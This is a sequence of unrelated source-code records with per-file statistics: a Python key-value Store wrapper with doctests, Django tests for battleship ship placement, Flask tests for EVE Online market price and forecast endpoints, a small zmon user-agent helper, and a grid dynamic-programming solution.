>>> # input keys will be upper cased, and output keys lower cased ##################################
>>> # input values (assumed int) will be converted to ascii string, and visa versa #################
>>> ################################################################################################
>>>
>>> def test_store(s):
... s['foo'] = 33 # write 33 to 'foo'
... assert 'foo' in s # __contains__ works
... assert 'no_such_key' not in s # __nin__ works
... s['bar'] = 65 # write 65 to 'bar'
... assert len(s) == 2 # there are indeed two elements
... assert list(s) == ['foo', 'bar'] # these are the keys
... assert list(s.keys()) == ['foo', 'bar'] # the keys() method works!
... assert list(s.values()) == [33, 65] # the values() method works!
... assert list(s.items()) == [('foo', 33), ('bar', 65)] # these are the items
... assert list(s.store.items()) == [('FOO', '!'), ('BAR', 'A')] # but note the internal representation
... assert s.get('foo') == 33 # the get method works
... assert s.get('no_such_key', 'something') == 'something' # return a default value
... del(s['foo']) # you can delete an item given its key
... assert len(s) == 1 # see, only one item left!
... assert list(s.items()) == [('bar', 65)] # here it is
>>>
>>> # We can introduce this conversion layer in several ways. Here's a few... ######################
>>> # by subclassing ###############################################################################
>>> class MyStore(Store):
... def _id_of_key(self, k):
... return k.upper()
... def _key_of_id(self, _id):
... return _id.lower()
... def _data_of_obj(self, obj):
... return chr(obj)
... def _obj_of_data(self, data):
... return ord(data)
>>> s = MyStore(store=dict()) # note that you don't need to specify dict(), since it's the default
>>> test_store(s)
>>>
>>> # by assigning functions to converters ##########################################################
>>> class MyStore(Store):
... def __init__(self, store, _id_of_key, _key_of_id, _data_of_obj, _obj_of_data):
... super().__init__(store)
... self._id_of_key = _id_of_key
... self._key_of_id = _key_of_id
... self._data_of_obj = _data_of_obj
... self._obj_of_data = _obj_of_data
...
>>> s = MyStore(dict(),
... _id_of_key=lambda k: k.upper(),
... _key_of_id=lambda _id: _id.lower(),
... _data_of_obj=lambda obj: chr(obj),
... _obj_of_data=lambda data: ord(data))
>>> test_store(s)
>>>
>>> # using a Mixin class #############################################################################
>>> class Mixin:
... def _id_of_key(self, k):
... return k.upper()
... def _key_of_id(self, _id):
... return _id.lower()
... def _data_of_obj(self, obj):
... return chr(obj)
... def _obj_of_data(self, data):
... return ord(data)
...
>>> class MyStore(Mixin, Store): # note that the Mixin must come before Store in the mro
... pass
...
>>> s = MyStore() # no dict()? No, because default anyway
>>> test_store(s)
>>>
>>> # adding wrapper methods to an already made Store instance #########################################
>>> s = Store(dict())
>>> s._id_of_key=lambda k: k.upper()
>>> s._key_of_id=lambda _id: _id.lower()
>>> s._data_of_obj=lambda obj: chr(obj)
>>> s._obj_of_data=lambda data: ord(data)
>>> test_store(s)
"""
# __slots__ = ('_id_of_key', '_key_of_id', '_data_of_obj', '_obj_of_data')
def __init__(self, store=dict):
if isinstance(store, type):
store = store()
self.store = store
_id_of_key = static_identity_method
_key_of_id = static_identity_method
_data_of_obj = static_identity_method
_obj_of_data = static_identity_method
# Read ####################################################################
def __getitem__(self, k: Key) -> Val:
return self._obj_of_data(self.store[self._id_of_key(k)])
def get(self, k: Key, default=None) -> Val:
data = self.store.get(self._id_of_key(k), no_such_item)
if data is not no_such_item:
return self._obj_of_data(data)
else:
return default
# Explore ####################################################################
def __iter__(self) -> KeyIter:
return map(self._key_of_id, iter(self.store))
def __len__(self) -> int:
return len(self.store)
def __contains__(self, k) -> bool:
return self._id_of_key(k) in self.store
def head(self) -> Item:
for k, v in self.items():
return k, v
# Write ####################################################################
def __setitem__(self, k: Key, v: Val):
self.store[self._id_of_key(k)] = self._data_of_obj(v)
# return self.store.__setitem__(self._id_of_key(k), self._data_of_obj(v))
# Delete ####################################################################
def __delitem__(self, k: Key):
del self.store[self._id_of_key(k)]
# return self.store.__delitem__(self._id_of_key(k))
def clear(self):
raise NotImplementedError('''
The clear method was overridden to make dangerous difficult.
If you really want to delete all your data, you can do so by doing:
try:
while True:
self.popitem()
except KeyError:
pass''')
# Misc ####################################################################
def __repr__(self):
return repr(self.store)
| 43.41716
| 115
| 0.498467
| 1,767
| 14,675
| 3.804188
| 0.127334
| 0.024398
| 0.042696
| 0.036001
| 0.876822
| 0.871169
| 0.871169
| 0.863434
| 0.824755
| 0.824755
| 0
| 0.006327
| 0.246065
| 14,675
| 337
| 116
| 43.545994
| 0.601229
| 0.668211
| 0
| 0.795181
| 0
| 0
| 0.161338
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.26506
| false
| 0.024096
| 0.012048
| 0.144578
| 0.614458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
998c9a078723d6f5df07e87f8f05a4c12af23898
| 6,238
|
py
|
Python
|
fleets/tests.py
|
elcolie/battleship
|
71b0a963c5b24ae243a193749813fec321d5f4d8
|
[
"MIT"
] | null | null | null |
fleets/tests.py
|
elcolie/battleship
|
71b0a963c5b24ae243a193749813fec321d5f4d8
|
[
"MIT"
] | 3
|
2018-04-22T04:40:25.000Z
|
2020-06-05T19:10:08.000Z
|
fleets/tests.py
|
elcolie/battleship
|
71b0a963c5b24ae243a193749813fec321d5f4d8
|
[
"MIT"
] | null | null | null |
import pytest
from django.conf import settings
from django.db import IntegrityError
from fleets.models import Fleet
from commons.conftest import board
from fleets.utils import add_battleship, OutOceanException, add_submarine, NearShipException
def test_place_battleship_left_top_corner_vertical(board):
add_battleship(board, 1, 1, vertical=True)
assert 4 == Fleet.objects.filter(fleet_type=Fleet.FleetType.battleship, x_axis=1, occupied=True).count()
def test_place_battleship_left_top_corner_horizontal(board):
add_battleship(board, 1, 1, vertical=False)
assert 4 == Fleet.objects.filter(fleet_type=Fleet.FleetType.battleship, y_axis=1, occupied=True).count()
def test_place_battleship_left_bottom_vertical(board):
"""Expect raises an Exception"""
with pytest.raises(OutOceanException):
add_battleship(board, 1, 10, vertical=True)
assert 0 == Fleet.objects.count()
def test_place_battleship_left_bottom_horizontal(board):
add_battleship(board, 1, 10, vertical=False)
assert 4 == Fleet.objects.filter(fleet_type=Fleet.FleetType.battleship, y_axis=10, occupied=True).count()
def test_place_battleship_right_top_vertical(board):
add_battleship(board, 10, 1, vertical=True)
assert 4 == Fleet.objects.filter(fleet_type=Fleet.FleetType.battleship, x_axis=10, occupied=True).count()
def test_place_battleship_at_right_top_horizontal(board):
with pytest.raises(OutOceanException):
add_battleship(board, 10, 1, vertical=False)
assert 0 == Fleet.objects.count()
def test_place_battleship_at_right_bottom_vertical(board):
with pytest.raises(OutOceanException):
add_battleship(board, 10, 10, vertical=True)
assert 0 == Fleet.objects.count()
def test_place_battleship_at_right_bottom_horizontal(board):
with pytest.raises(OutOceanException):
add_battleship(board, 10, 10, vertical=False)
assert 0 == Fleet.objects.count()
def test_place_submarine_left_top_vertical(board):
add_submarine(board, 1, 1, vertical=True)
assert 1 == Fleet.objects.filter(occupied=True).count()
def test_place_submarine_left_top_horizontal(board):
add_submarine(board, 1, 1, vertical=False)
assert 1 == Fleet.objects.filter(occupied=True).count()
def test_place_submarine_right_bottom(board):
add_submarine(board, 1, 1, vertical=False)
assert 1 == Fleet.objects.filter(occupied=True).count()
'''Vertical/Horizontal surrounding'''
def test_submarine_surrounding_vertical_under(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 6, vertical=False)
def test_submarine_surrounding_vertical_upper(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 4, vertical=False)
def test_submarine_surrounding_horizontal_left(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 5, vertical=False)
def test_submarine_surrounding_horizontal_right(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 6, 5, vertical=False)
'''Diagonal surrounding'''
def test_submarine_surrounding_up_left(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 4, vertical=False)
def test_submarine_surrounding_up_right(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 6, 4, vertical=False)
def test_submarine_surrounding_down_left(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 6, vertical=False)
def test_submarine_surrounding_down_right(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 6, 6, vertical=False)
def test_submarine_overlap_battle_ship(board):
"""
X : submarine
Y : battleship
Alignment: XYYYY
:param board:
:return:
"""
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_battleship(board, 5, 6, vertical=False)
def test_battleship_horizontal_then_submarine_top_left(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 4, vertical=False)
def test_battleship_horizontal_then_submarine_top_mid(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 4, vertical=False)
def test_battleship_horizontal_then_submarine_top_right(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 6, 4, vertical=False)
def test_battleship_horizontal_then_submarine_left_mid(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 5, vertical=False)
def test_battleship_horizontal_then_submarine_left_down(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 4, vertical=False)
def test_battleship_horizontal_then_submarine_down_mid(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 4, vertical=False)
def test_battleship_horizontal_then_submarine_down_right(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 6, vertical=False)
def test_battleship_horizontal_then_submarine_right_mid(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5 + settings.BATTLESHIP_SIZE, 5, vertical=False)
def test_battleships_cross_each_others_at_mid(board):
add_battleship(board, 5, 5, vertical=False)
# Handle at database layer
with pytest.raises(IntegrityError):
add_battleship(board, 6, 3, vertical=True)
| 32.831579
| 109
| 0.756332
| 818
| 6,238
| 5.51467
| 0.095355
| 0.118156
| 0.10552
| 0.059854
| 0.873199
| 0.842607
| 0.819996
| 0.733319
| 0.733319
| 0.688982
| 0
| 0.022301
| 0.144598
| 6,238
| 189
| 110
| 33.005291
| 0.823088
| 0.019397
| 0
| 0.521739
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095652
| 1
| 0.252174
| false
| 0
| 0.052174
| 0
| 0.304348
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41d7ce148bc066173427996271d6d830ef33de3c
| 14,676
|
py
|
Python
|
tests/test_crest_endpoint.py
|
EVEprosper/ProsperAPI
|
2d25b9210d32ca777204b1dddb56848d7075dd85
|
[
"MIT"
] | 13
|
2017-03-27T13:10:52.000Z
|
2020-07-30T09:33:11.000Z
|
tests/test_crest_endpoint.py
|
EVEprosper/ProsperAPI
|
2d25b9210d32ca777204b1dddb56848d7075dd85
|
[
"MIT"
] | 19
|
2016-11-14T00:58:54.000Z
|
2018-06-11T16:54:25.000Z
|
tests/test_crest_endpoint.py
|
EVEprosper/ProsperAPI
|
2d25b9210d32ca777204b1dddb56848d7075dd85
|
[
"MIT"
] | 5
|
2017-04-19T01:12:06.000Z
|
2021-03-07T02:23:45.000Z
|
from os import path, listdir, remove
import platform
import io
from datetime import datetime, timedelta
import time
import json
import pandas as pd
from tinymongo import TinyMongoClient
import pytest
from flask import url_for
import publicAPI.exceptions as exceptions
import publicAPI.config as api_utils
import helpers
HERE = path.abspath(path.dirname(__file__))
ROOT = path.dirname(HERE)
CONFIG_FILENAME = path.join(HERE, 'test_config.cfg')
CONFIG = helpers.get_config(CONFIG_FILENAME)
ROOT_CONFIG = helpers.get_config(
path.join(ROOT, 'scripts', 'app.cfg')
)
TEST_CACHE_PATH = path.join(HERE, 'cache')
CACHE_PATH = path.join(ROOT, 'publicAPI', 'cache')
BASE_URL = 'http://localhost:8000'
def test_clear_caches():
"""remove cache files for test"""
helpers.clear_caches(True)
VIRGIN_RUNTIME = None
@pytest.mark.usefixtures('client_class')
class TestODBCcsv:
"""test framework for collecting endpoint stats"""
def test_odbc_happypath(self):
"""exercise `collect_stats`"""
global VIRGIN_RUNTIME
fetch_start = time.time()
req = self.client.get(
url_for('ohlc_endpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
fetch_end = time.time()
VIRGIN_RUNTIME = fetch_end - fetch_start
print(req.__dict__)
data = None
with io.StringIO(req.data.decode()) as buff:
data = pd.read_csv(buff)
assert req._status_code == 200
expected_headers = [
'date',
'open',
'high',
'low',
'close',
'volume'
]
assert set(expected_headers) == set(data.columns.values)
def test_odbc_happypath_cached(self):
"""rerun test with cached values"""
fetch_start = time.time()
req = self.client.get(
url_for('ohlc_endpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
fetch_end = time.time()
runtime = fetch_end - fetch_start
if runtime > VIRGIN_RUNTIME/1.5:
pytest.xfail('cached performance slower than expected')
def test_odbc_bad_typeid(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'bad_typeid'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
assert req._status_code == 404
def test_odbc_bad_regionid(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'bad_regionid')
)
)
assert req._status_code == 404
def test_odbc_bad_format(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='butts') +
'?typeID={type_id}®ionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
assert req._status_code == 405
@pytest.mark.usefixtures('client_class')
class TestODBCjson:
"""test framework for collecting endpoint stats"""
def test_odbc_happypath(self):
"""exercise `collect_stats`"""
test_clear_caches()
global VIRGIN_RUNTIME
fetch_start = time.time()
req = self.client.get(
url_for('ohlc_endpoint', return_type='json') +
'?typeID={type_id}®ionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
fetch_end = time.time()
VIRGIN_RUNTIME = fetch_end - fetch_start
raw_data = json.loads(req.data.decode())
data = pd.DataFrame(raw_data)
assert req._status_code == 200
expected_headers = [
'date',
'open',
'high',
'low',
'close',
'volume'
]
assert set(expected_headers) == set(data.columns.values)
def test_odbc_bad_typeid(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='json') +
'?typeID={type_id}®ionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'bad_typeid'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
assert req._status_code == 404
def test_odbc_bad_regionid(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='json') +
'?typeID={type_id}®ionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'bad_regionid')
)
)
assert req._status_code == 404
TEST_API_KEY = ''
def test_get_api_key():
"""fetch api key from cache for testing"""
global TEST_API_KEY
connection = TinyMongoClient(CACHE_PATH)
api_db = connection.prosperAPI.users
vals = api_db.find()
if not vals:
pytest.xfail('Unable to test without test keys')
test_key = vals['api_key']
connection.close()
TEST_API_KEY = test_key
@pytest.mark.prophet
@pytest.mark.usefixtures('client_class')
class TestProphetcsv:
"""test framework for collecting endpoint stats"""
def test_prophet_happypath(self):
"""exercise `collect_stats`"""
test_clear_caches()
assert TEST_API_KEY != ''
global VIRGIN_RUNTIME
fetch_start = time.time()
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
fetch_end = time.time()
VIRGIN_RUNTIME = fetch_end - fetch_start
data = None
with io.StringIO(req.data.decode()) as buff:
data = pd.read_csv(buff)
assert req._status_code == 200
expected_headers = [
'date',
'avgPrice',
'yhat',
'yhat_low',
'yhat_high',
'prediction'
]
assert set(expected_headers) == set(data.columns.values)
##TODO: validate ranges?
def test_prophet_happypath_cached(self):
"""exercise `collect_stats`"""
fetch_start = time.time()
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
fetch_end = time.time()
runtime = fetch_end - fetch_start
if runtime > VIRGIN_RUNTIME/1.5:
pytest.xfail('cached performance slower than expected')
def test_prophet_bad_regionid(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'bad_regionid'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 404
def test_prophet_bad_typeid(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'bad_typeid'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 404
def test_prophet_bad_api(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key='IMAHUGEBUTT',
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 401
def test_prophet_bad_range(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=9001
)
)
assert req._status_code == 413
def test_prophet_bad_format(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='butts') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 405
@pytest.mark.prophet
@pytest.mark.usefixtures('client_class')
class TestProphetjson:
"""test framework for collecting endpoint stats"""
def test_prophet_happypath(self):
"""exercise `collect_stats`"""
test_clear_caches()
global VIRGIN_RUNTIME
fetch_start = time.time()
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
fetch_end = time.time()
VIRGIN_RUNTIME = fetch_end - fetch_start
raw_data = json.loads(req.data.decode())
data = pd.DataFrame(raw_data)
assert req._status_code == 200
expected_headers = [
'date',
'avgPrice',
'yhat',
'yhat_low',
'yhat_high',
'prediction'
]
assert set(expected_headers) == set(data.columns.values)
##TODO: validate ranges?
def test_prophet_happypath_cached(self):
"""exercise `collect_stats`"""
fetch_start = time.time()
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
fetch_end = time.time()
runtime = fetch_end - fetch_start
if runtime > VIRGIN_RUNTIME/1.5:
pytest.xfail('cached performance slower than expected')
def test_prophet_bad_regionid(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'bad_regionid'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 404
def test_prophet_bad_typeid(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'bad_typeid'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 404
def test_prophet_bad_api(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key='IMAHUGEBUTT',
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 401
def test_prophet_bad_range(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}®ionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=9000
)
)
assert req._status_code == 413
| 35.535109
| 88
| 0.570796
| 1,677
| 14,676
| 4.725104
| 0.093023
| 0.059566
| 0.086951
| 0.079505
| 0.871277
| 0.865724
| 0.857648
| 0.855628
| 0.855628
| 0.83897
| 0
| 0.006975
| 0.296675
| 14,676
| 412
| 89
| 35.621359
| 0.760705
| 0.063301
| 0
| 0.718475
| 0
| 0
| 0.201867
| 0.085391
| 0
| 0
| 0
| 0.002427
| 0.067449
| 1
| 0.067449
| false
| 0
| 0.038123
| 0
| 0.117302
| 0.002933
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41e7a7002edbf0ef23115a82d956ae1a5208a6c5
| 110
|
py
|
Python
|
zmon_agent/common.py
|
linki/zmon-agent-core
|
f8f2ced79c05705fa1062b577687e4f60ae0872a
|
[
"MIT"
] | 1
|
2019-01-19T15:04:04.000Z
|
2019-01-19T15:04:04.000Z
|
zmon_agent/common.py
|
linki/zmon-agent-core
|
f8f2ced79c05705fa1062b577687e4f60ae0872a
|
[
"MIT"
] | 116
|
2016-12-06T12:54:31.000Z
|
2020-03-10T09:43:26.000Z
|
zmon_agent/common.py
|
linki/zmon-agent-core
|
f8f2ced79c05705fa1062b577687e4f60ae0872a
|
[
"MIT"
] | 12
|
2017-02-16T21:40:56.000Z
|
2020-01-13T17:06:38.000Z
|
from zmon_agent import __version__
def get_user_agent():
return 'zmon-k8s-agent/{}'.format(__version__)
| 18.333333
| 50
| 0.754545
| 15
| 110
| 4.8
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010417
| 0.127273
| 110
| 5
| 51
| 22
| 0.739583
| 0
| 0
| 0
| 0
| 0
| 0.154545
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
510ce0676e3a9c44356d6099b0b7320a4ce8dda5
| 2,028
|
py
|
Python
|
BOJ/17000~17999/17200~17299/17265.py
|
shinkeonkim/today-ps
|
f3e5e38c5215f19579bb0422f303a9c18c626afa
|
[
"Apache-2.0"
] | 2
|
2020-01-29T06:54:41.000Z
|
2021-11-07T13:23:27.000Z
|
BOJ/17000~17999/17200~17299/17265.py
|
shinkeonkim/Today_PS
|
bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44
|
[
"Apache-2.0"
] | null | null | null |
BOJ/17000~17999/17200~17299/17265.py
|
shinkeonkim/Today_PS
|
bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44
|
[
"Apache-2.0"
] | null | null | null |
def f(a,b,cc):
if cc == '+':
return a+b
if cc == '-':
return a-b
if cc == '*':
return a*b
n=int(input())
L=[]
for i in range(n):
a=input()
L.append(a.split())
D = [[-987654321]*(n) for i in range(n)]
D2 = [[987654321]*(n) for i in range(n)]
for i in range(n):
if i%2 == 0:
for j in range(0,n,2):
L[i][j] = int(L[i][j])
else:
for j in range(1,n,2):
L[i][j] = int(L[i][j])
D[0][0]=L[0][0]
for i in range(2,n,2):
D[0][i] = f(D[0][i-2],L[0][i],L[0][i-1])
D[i][0] = f(D[i-2][0],L[i][0],L[i-1][0])
for i in range(1,n):
if i%2 == 0:
for j in range(2,n,2):
if i > 1:
D[i][j] = max(D[i][j],f(D[i-2][j],L[i][j],L[i-1][j]))
D[i][j] = max(D[i][j],f(D[i][j-2],L[i][j],L[i][j-1]),f(D[i-1][j-1],L[i][j],L[i-1][j]),f(D[i-1][j-1],L[i][j],L[i][j-1]))
else:
for j in range(1,n,2):
if i > 1:
D[i][j] = max(D[i][j],f(D[i-2][j],L[i][j],L[i-1][j]))
if j > 1:
D[i][j] = max(D[i][j],f(D[i][j-2],L[i][j],L[i][j-1]))
D[i][j] = max(D[i][j],f(D[i-1][j-1],L[i][j],L[i-1][j]),f(D[i-1][j-1],L[i][j],L[i][j-1]))
D2[0][0]=L[0][0]
for i in range(2,n,2):
D2[0][i] = f(D2[0][i-2],L[0][i],L[0][i-1])
D2[i][0] = f(D2[i-2][0],L[i][0],L[i-1][0])
for i in range(1,n):
if i%2 == 0:
for j in range(2,n,2):
if i > 1:
D2[i][j] = min(D2[i][j],f(D2[i-2][j],L[i][j],L[i-1][j]))
D2[i][j] = min(D2[i][j],f(D2[i][j-2],L[i][j],L[i][j-1]),f(D2[i-1][j-1],L[i][j],L[i-1][j]),f(D2[i-1][j-1],L[i][j],L[i][j-1]))
else:
for j in range(1,n,2):
if i > 1:
D2[i][j] = min(D2[i][j],f(D2[i-2][j],L[i][j],L[i-1][j]))
if j > 1:
D2[i][j] = min(D2[i][j],f(D2[i][j-2],L[i][j],L[i][j-1]))
D2[i][j] = min(D2[i][j],f(D2[i-1][j-1],L[i][j],L[i-1][j]),f(D2[i-1][j-1],L[i][j],L[i][j-1]))
print(D[n-1][n-1],D2[n-1][n-1])
| 28.56338
| 136
| 0.370809
| 524
| 2,028
| 1.435115
| 0.053435
| 0.138298
| 0.111702
| 0.085106
| 0.890957
| 0.875
| 0.860372
| 0.801862
| 0.777926
| 0.726064
| 0
| 0.101637
| 0.27712
| 2,028
| 71
| 137
| 28.56338
| 0.411323
| 0
| 0
| 0.517857
| 0
| 0
| 0.001479
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0
| 0
| 0
| 0.071429
| 0.017857
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5ab8e4a88c8a075df7661504f604ee8dece6d854
| 4,898
|
py
|
Python
|
tests/tests/test_fields/test_datetime_fields.py
|
intellineers/django-bridger
|
ed097984a99df7da40a4d01bd00c56e3c6083056
|
[
"BSD-3-Clause"
] | 2
|
2020-03-17T00:53:23.000Z
|
2020-07-16T07:00:33.000Z
|
tests/tests/test_fields/test_datetime_fields.py
|
intellineers/django-bridger
|
ed097984a99df7da40a4d01bd00c56e3c6083056
|
[
"BSD-3-Clause"
] | 76
|
2019-12-05T01:15:57.000Z
|
2021-09-07T16:47:27.000Z
|
tests/tests/test_fields/test_datetime_fields.py
|
intellineers/django-bridger
|
ed097984a99df7da40a4d01bd00c56e3c6083056
|
[
